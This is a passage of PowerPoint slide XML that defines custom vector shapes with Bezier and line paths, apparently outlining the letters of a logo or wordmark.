                      <a:pt x="17" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="5"/>
                      <a:pt x="15" y="4"/>
                      <a:pt x="14" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="3"/>
                      <a:pt x="11" y="2"/>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45"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5475288" y="1263650"/>
                <a:ext cx="34925" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 17"/>
                  <a:gd name="T1" fmla="*/ 19 h 19"/>
                  <a:gd name="T2" fmla="*/ 0 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 19"/>
                  <a:gd name="T4" fmla="*/ 4 w 17"/>
                  <a:gd name="T5" fmla="*/ 0 h 19"/>
                  <a:gd name="T6" fmla="*/ 11 w 17"/>
                  <a:gd name="T7" fmla="*/ 1 h 19"/>
                  <a:gd name="T8" fmla="*/ 15 w 17"/>
                  <a:gd name="T9" fmla="*/ 4 h 19"/>
                  <a:gd name="T10" fmla="*/ 17 w 17"/>
                  <a:gd name="T11" fmla="*/ 10 h 19"/>
                  <a:gd name="T12" fmla="*/ 15 w 17"/>
                  <a:gd name="T13" fmla="*/ 15 h 19"/>
                  <a:gd name="T14" fmla="*/ 12 w 17"/>
                  <a:gd name="T15" fmla="*/ 18 h 19"/>
                  <a:gd name="T16" fmla="*/ 6 w 17"/>
                  <a:gd name="T17" fmla="*/ 19 h 19"/>
                  <a:gd name="T18" fmla="*/ 0 w 17"/>
                  <a:gd name="T19" fmla="*/ 19 h 19"/>
                  <a:gd name="T20" fmla="*/ 2 w 17"/>
                  <a:gd name="T21" fmla="*/ 18 h 19"/>
                  <a:gd name="T22" fmla="*/ 4 w 17"/>
                  <a:gd name="T23" fmla="*/ 18 h 19"/>
                  <a:gd name="T24" fmla="*/ 10 w 17"/>
                  <a:gd name="T25" fmla="*/ 17 h 19"/>
                  <a:gd name="T26" fmla="*/ 13 w 17"/>
                  <a:gd name="T27" fmla="*/ 14 h 19"/>
                  <a:gd name="T28" fmla="*/ 15 w 17"/>
                  <a:gd name="T29" fmla="*/ 10 h 19"/>
                  <a:gd name="T30" fmla="*/ 13 w 17"/>
                  <a:gd name="T31" fmla="*/ 5 h 19"/>
                  <a:gd name="T32" fmla="*/ 9 w 17"/>
                  <a:gd name="T33" fmla="*/ 2 h 19"/>
                  <a:gd name="T34" fmla="*/ 3 w 17"/>
                  <a:gd name="T35" fmla="*/ 2 h 19"/>
                  <a:gd name="T36" fmla="*/ 2 w 17"/>
                  <a:gd name="T37" fmla="*/ 2 h 19"/>
                  <a:gd name="T38" fmla="*/ 2 w 17"/>
                  <a:gd name="T3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19">
                    <a:moveTo>
                      <a:pt x="0" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="11" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="1"/>
                      <a:pt x="14" y="2"/>
                      <a:pt x="15" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="6"/>
                      <a:pt x="17" y="8"/>
                      <a:pt x="17" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="12"/>
                      <a:pt x="16" y="14"/>
                      <a:pt x="15" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="17"/>
                      <a:pt x="13" y="18"/>
                      <a:pt x="12" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="19"/>
                      <a:pt x="9" y="19"/>
                      <a:pt x="6" y="19"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2" y="18"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="18"/>
                      <a:pt x="4" y="18"/>
                      <a:pt x="4" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="18"/>
                      <a:pt x="9" y="17"/>
                      <a:pt x="10" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="17"/>
                      <a:pt x="13" y="16"/>
                      <a:pt x="13" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="13"/>
                      <a:pt x="15" y="12"/>
                      <a:pt x="15" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="8"/>
                      <a:pt x="14" y="6"/>
                      <a:pt x="13" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="4"/>
                      <a:pt x="11" y="3"/>
                      <a:pt x="9" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="2"/>
                      <a:pt x="6" y="2"/>
                      <a:pt x="3" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="2"/>
                      <a:pt x="2" y="2"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBez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46"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5516563" y="1263650"/>
                <a:ext cx="23813" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 24"/>
                  <a:gd name="T2" fmla="*/ 15 w 15"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                  <a:gd name="T5" fmla="*/ 2 h 24"/>
                  <a:gd name="T6" fmla="*/ 2 w 15"/>
                  <a:gd name="T7" fmla="*/ 2 h 24"/>
                  <a:gd name="T8" fmla="*/ 2 w 15"/>
                  <a:gd name="T9" fmla="*/ 10 h 24"/>
                  <a:gd name="T10" fmla="*/ 15 w 15"/>
                  <a:gd name="T11" fmla="*/ 10 h 24"/>
                  <a:gd name="T12" fmla="*/ 15 w 15"/>
                  <a:gd name="T13" fmla="*/ 13 h 24"/>
                  <a:gd name="T14" fmla="*/ 2 w 15"/>
                  <a:gd name="T15" fmla="*/ 13 h 24"/>
                  <a:gd name="T16" fmla="*/ 2 w 15"/>
                  <a:gd name="T17" fmla="*/ 22 h 24"/>
                  <a:gd name="T18" fmla="*/ 15 w 15"/>
                  <a:gd name="T19" fmla="*/ 22 h 24"/>
                  <a:gd name="T20" fmla="*/ 15 w 15"/>
                  <a:gd name="T21" fmla="*/ 24 h 24"/>
                  <a:gd name="T22" fmla="*/ 0 w 15"/>
                  <a:gd name="T23" fmla="*/ 24 h 24"/>
                  <a:gd name="T24" fmla="*/ 0 w 15"/>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4">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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47"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5546725" y="1273175"/>
                <a:ext cx="6350" cy="31750"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 15"/>
                  <a:gd name="T2" fmla="*/ 3 w 3"/>
                  <a:gd name="T3" fmla="*/ 0 h 15"/>
                  <a:gd name="T4" fmla="*/ 3 w 3"/>
                  <a:gd name="T5" fmla="*/ 1 h 15"/>
                  <a:gd name="T6" fmla="*/ 3 w 3"/>
                  <a:gd name="T7" fmla="*/ 2 h 15"/>
                  <a:gd name="T8" fmla="*/ 2 w 3"/>
                  <a:gd name="T9" fmla="*/ 3 h 15"/>
                  <a:gd name="T10" fmla="*/ 1 w 3"/>
                  <a:gd name="T11" fmla="*/ 2 h 15"/>
                  <a:gd name="T12" fmla="*/ 0 w 3"/>
                  <a:gd name="T13" fmla="*/ 1 h 15"/>
                  <a:gd name="T14" fmla="*/ 1 w 3"/>
                  <a:gd name="T15" fmla="*/ 0 h 15"/>
                  <a:gd name="T16" fmla="*/ 2 w 3"/>
                  <a:gd name="T17" fmla="*/ 0 h 15"/>
                  <a:gd name="T18" fmla="*/ 2 w 3"/>
                  <a:gd name="T19" fmla="*/ 11 h 15"/>
                  <a:gd name="T20" fmla="*/ 3 w 3"/>
                  <a:gd name="T21" fmla="*/ 12 h 15"/>
                  <a:gd name="T22" fmla="*/ 3 w 3"/>
                  <a:gd name="T23" fmla="*/ 13 h 15"/>
                  <a:gd name="T24" fmla="*/ 3 w 3"/>
                  <a:gd name="T25" fmla="*/ 14 h 15"/>
                  <a:gd name="T26" fmla="*/ 2 w 3"/>
                  <a:gd name="T27" fmla="*/ 15 h 15"/>
                  <a:gd name="T28" fmla="*/ 1 w 3"/>
                  <a:gd name="T29" fmla="*/ 14 h 15"/>
                  <a:gd name="T30" fmla="*/ 0 w 3"/>
                  <a:gd name="T31" fmla="*/ 13 h 15"/>
                  <a:gd name="T32" fmla="*/ 1 w 3"/>
                  <a:gd name="T33" fmla="*/ 12 h 15"/>
                  <a:gd name="T34" fmla="*/ 2 w 3"/>
                  <a:gd name="T35"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15">
                    <a:moveTo>
                      <a:pt x="2" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="0"/>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="2"/>
                      <a:pt x="3" y="2"/>
                      <a:pt x="3" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="3"/>
                      <a:pt x="2" y="3"/>
                      <a:pt x="2" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="3"/>
                      <a:pt x="1" y="3"/>
                      <a:pt x="1" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="1" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="0"/>
                      <a:pt x="1" y="0"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="11"/>
                      <a:pt x="3" y="12"/>
                      <a:pt x="3" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="12"/>
                      <a:pt x="3" y="13"/>
                      <a:pt x="3" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="14"/>
                      <a:pt x="3" y="14"/>
                      <a:pt x="3" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="15"/>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="15"/>
                      <a:pt x="1" y="15"/>
                      <a:pt x="1" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="14"/>
                      <a:pt x="0" y="14"/>
                      <a:pt x="0" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="13"/>
                      <a:pt x="0" y="12"/>
                      <a:pt x="1" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="12"/>
                      <a:pt x="1" y="11"/>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48"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5573713" y="1262063"/>
                <a:ext cx="23813" cy="42863"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 12"/>
                  <a:gd name="T1" fmla="*/ 17 h 21"/>
                  <a:gd name="T2" fmla="*/ 2 w 12"/>
                  <a:gd name="T3" fmla="*/ 16 h 21"/>
                  <a:gd name="T4" fmla="*/ 6 w 12"/>
                  <a:gd name="T5" fmla="*/ 19 h 21"/>
                  <a:gd name="T6" fmla="*/ 8 w 12"/>
                  <a:gd name="T7" fmla="*/ 19 h 21"/>
                  <a:gd name="T8" fmla="*/ 9 w 12"/>
                  <a:gd name="T9" fmla="*/ 17 h 21"/>
                  <a:gd name="T10" fmla="*/ 9 w 12"/>
                  <a:gd name="T11" fmla="*/ 16 h 21"/>
                  <a:gd name="T12" fmla="*/ 9 w 12"/>
                  <a:gd name="T13" fmla="*/ 14 h 21"/>
                  <a:gd name="T14" fmla="*/ 5 w 12"/>
                  <a:gd name="T15" fmla="*/ 11 h 21"/>
                  <a:gd name="T16" fmla="*/ 2 w 12"/>
                  <a:gd name="T17" fmla="*/ 8 h 21"/>
                  <a:gd name="T18" fmla="*/ 1 w 12"/>
                  <a:gd name="T19" fmla="*/ 5 h 21"/>
                  <a:gd name="T20" fmla="*/ 2 w 12"/>
                  <a:gd name="T21" fmla="*/ 3 h 21"/>
                  <a:gd name="T22" fmla="*/ 4 w 12"/>
                  <a:gd name="T23" fmla="*/ 1 h 21"/>
                  <a:gd name="T24" fmla="*/ 6 w 12"/>
                  <a:gd name="T25" fmla="*/ 0 h 21"/>
                  <a:gd name="T26" fmla="*/ 9 w 12"/>
                  <a:gd name="T27" fmla="*/ 1 h 21"/>
                  <a:gd name="T28" fmla="*/ 11 w 12"/>
                  <a:gd name="T29" fmla="*/ 4 h 21"/>
                  <a:gd name="T30" fmla="*/ 10 w 12"/>
                  <a:gd name="T31" fmla="*/ 5 h 21"/>
                  <a:gd name="T32" fmla="*/ 8 w 12"/>
                  <a:gd name="T33" fmla="*/ 3 h 21"/>
                  <a:gd name="T34" fmla="*/ 6 w 12"/>
                  <a:gd name="T35" fmla="*/ 2 h 21"/>
                  <a:gd name="T36" fmla="*/ 4 w 12"/>
                  <a:gd name="T37" fmla="*/ 3 h 21"/>
                  <a:gd name="T38" fmla="*/ 3 w 12"/>
                  <a:gd name="T39" fmla="*/ 5 h 21"/>
                  <a:gd name="T40" fmla="*/ 4 w 12"/>
                  <a:gd name="T41" fmla="*/ 6 h 21"/>
                  <a:gd name="T42" fmla="*/ 5 w 12"/>
                  <a:gd name="T43" fmla="*/ 7 h 21"/>
                  <a:gd name="T44" fmla="*/ 7 w 12"/>
                  <a:gd name="T45" fmla="*/ 9 h 21"/>
                  <a:gd name="T46" fmla="*/ 11 w 12"/>
                  <a:gd name="T47" fmla="*/ 13 h 21"/>
                  <a:gd name="T48" fmla="*/ 12 w 12"/>
                  <a:gd name="T49" fmla="*/ 16 h 21"/>
                  <a:gd name="T50" fmla="*/ 10 w 12"/>
                  <a:gd name="T51" fmla="*/ 19 h 21"/>
                  <a:gd name="T52" fmla="*/ 6 w 12"/>
                  <a:gd name="T53" fmla="*/ 21 h 21"/>
                  <a:gd name="T54" fmla="*/ 3 w 12"/>
                  <a:gd name="T55" fmla="*/ 20 h 21"/>
                  <a:gd name="T56" fmla="*/ 0 w 12"/>
                  <a:gd name="T5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 h="21">
                    <a:moveTo>
                      <a:pt x="0" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="16"/>
                      <a:pt x="2" y="16"/>
                      <a:pt x="2" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="18"/>
                      <a:pt x="4" y="19"/>
                      <a:pt x="6" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="19"/>
                      <a:pt x="7" y="19"/>
                      <a:pt x="8" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="18"/>
                      <a:pt x="9" y="18"/>
                      <a:pt x="9" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="17"/>
                      <a:pt x="9" y="16"/>
                      <a:pt x="9" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="15"/>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="13"/>
                      <a:pt x="7" y="12"/>
                      <a:pt x="5" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="9"/>
                      <a:pt x="3" y="8"/>
                      <a:pt x="2" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="7"/>
                      <a:pt x="1" y="6"/>
                      <a:pt x="1" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="4"/>
                      <a:pt x="2" y="3"/>
                      <a:pt x="2" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="2"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="1"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="6" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="8" y="1"/>
                      <a:pt x="9" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="1"/>
                      <a:pt x="10" y="2"/>
                      <a:pt x="11" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="5"/>
                      <a:pt x="10" y="5"/>
                      <a:pt x="10" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="4"/>
                      <a:pt x="8" y="3"/>
                      <a:pt x="8" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="2"/>
                      <a:pt x="7" y="2"/>
                      <a:pt x="6" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="2"/>
                      <a:pt x="5" y="3"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="4"/>
                      <a:pt x="3" y="4"/>
                      <a:pt x="3" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="5"/>
                      <a:pt x="3" y="6"/>
                      <a:pt x="4" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="6"/>
                      <a:pt x="4" y="7"/>
                      <a:pt x="5" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="6" y="8"/>
                      <a:pt x="7" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="11"/>
                      <a:pt x="10" y="12"/>
                      <a:pt x="11" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="14"/>
                      <a:pt x="12" y="15"/>
                      <a:pt x="12" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="17"/>
                      <a:pt x="11" y="18"/>
                      <a:pt x="10" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="20"/>
                      <a:pt x="8" y="21"/>
                      <a:pt x="6" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="21"/>
                      <a:pt x="4" y="21"/>
                      <a:pt x="3" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="19"/>
                      <a:pt x="1" y="18"/>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49"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5602288" y="1263650"/>
                <a:ext cx="22225" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 14"/>
                  <a:gd name="T1" fmla="*/ 2 h 24"/>
                  <a:gd name="T2" fmla="*/ 0 w 14"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 14 w 14"/>
                  <a:gd name="T5" fmla="*/ 0 h 24"/>
                  <a:gd name="T6" fmla="*/ 14 w 14"/>
                  <a:gd name="T7" fmla="*/ 2 h 24"/>
                  <a:gd name="T8" fmla="*/ 8 w 14"/>
                  <a:gd name="T9" fmla="*/ 2 h 24"/>
                  <a:gd name="T10" fmla="*/ 8 w 14"/>
                  <a:gd name="T11" fmla="*/ 24 h 24"/>
                  <a:gd name="T12" fmla="*/ 5 w 14"/>
                  <a:gd name="T13" fmla="*/ 24 h 24"/>
                  <a:gd name="T14" fmla="*/ 5 w 14"/>
                  <a:gd name="T15" fmla="*/ 2 h 24"/>
                  <a:gd name="T16" fmla="*/ 0 w 14"/>
                  <a:gd name="T17"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4">
                    <a:moveTo>
                      <a:pt x="0" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5"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50"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5629275" y="1263650"/>
                <a:ext cx="23813" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 24"/>
                  <a:gd name="T2" fmla="*/ 15 w 15"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                  <a:gd name="T5" fmla="*/ 2 h 24"/>
                  <a:gd name="T6" fmla="*/ 2 w 15"/>
                  <a:gd name="T7" fmla="*/ 2 h 24"/>
                  <a:gd name="T8" fmla="*/ 2 w 15"/>
                  <a:gd name="T9" fmla="*/ 10 h 24"/>
                  <a:gd name="T10" fmla="*/ 15 w 15"/>
                  <a:gd name="T11" fmla="*/ 10 h 24"/>
                  <a:gd name="T12" fmla="*/ 15 w 15"/>
                  <a:gd name="T13" fmla="*/ 13 h 24"/>
                  <a:gd name="T14" fmla="*/ 2 w 15"/>
                  <a:gd name="T15" fmla="*/ 13 h 24"/>
                  <a:gd name="T16" fmla="*/ 2 w 15"/>
                  <a:gd name="T17" fmla="*/ 22 h 24"/>
                  <a:gd name="T18" fmla="*/ 15 w 15"/>
                  <a:gd name="T19" fmla="*/ 22 h 24"/>
                  <a:gd name="T20" fmla="*/ 15 w 15"/>
                  <a:gd name="T21" fmla="*/ 24 h 24"/>
                  <a:gd name="T22" fmla="*/ 0 w 15"/>
                  <a:gd name="T23" fmla="*/ 24 h 24"/>
                  <a:gd name="T24" fmla="*/ 0 w 15"/>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4">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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51"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5654675" y="1263650"/>
                <a:ext cx="39688" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 13 w 25"/>
                  <a:gd name="T1" fmla="*/ 0 h 24"/>
                  <a:gd name="T2" fmla="*/ 25 w 25"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 22 w 25"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 19 w 25"/>
                  <a:gd name="T7" fmla="*/ 17 h 24"/>
                  <a:gd name="T8" fmla="*/ 8 w 25"/>
                  <a:gd name="T9" fmla="*/ 17 h 24"/>
                  <a:gd name="T10" fmla="*/ 3 w 25"/>
                  <a:gd name="T11" fmla="*/ 24 h 24"/>
                  <a:gd name="T12" fmla="*/ 0 w 25"/>
                  <a:gd name="T13" fmla="*/ 24 h 24"/>
                  <a:gd name="T14" fmla="*/ 13 w 25"/>
                  <a:gd name="T15" fmla="*/ 0 h 24"/>
                  <a:gd name="T16" fmla="*/ 13 w 25"/>
                  <a:gd name="T17" fmla="*/ 0 h 24"/>
                  <a:gd name="T18" fmla="*/ 13 w 25"/>
                  <a:gd name="T19" fmla="*/ 5 h 24"/>
                  <a:gd name="T20" fmla="*/ 8 w 25"/>
                  <a:gd name="T21" fmla="*/ 14 h 24"/>
                  <a:gd name="T22" fmla="*/ 17 w 25"/>
                  <a:gd name="T23" fmla="*/ 14 h 24"/>
                  <a:gd name="T24" fmla="*/ 13 w 25"/>
                  <a:gd name="T25"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4">
                    <a:moveTo>
                      <a:pt x="13" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="13" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1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52"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5700713" y="1263650"/>
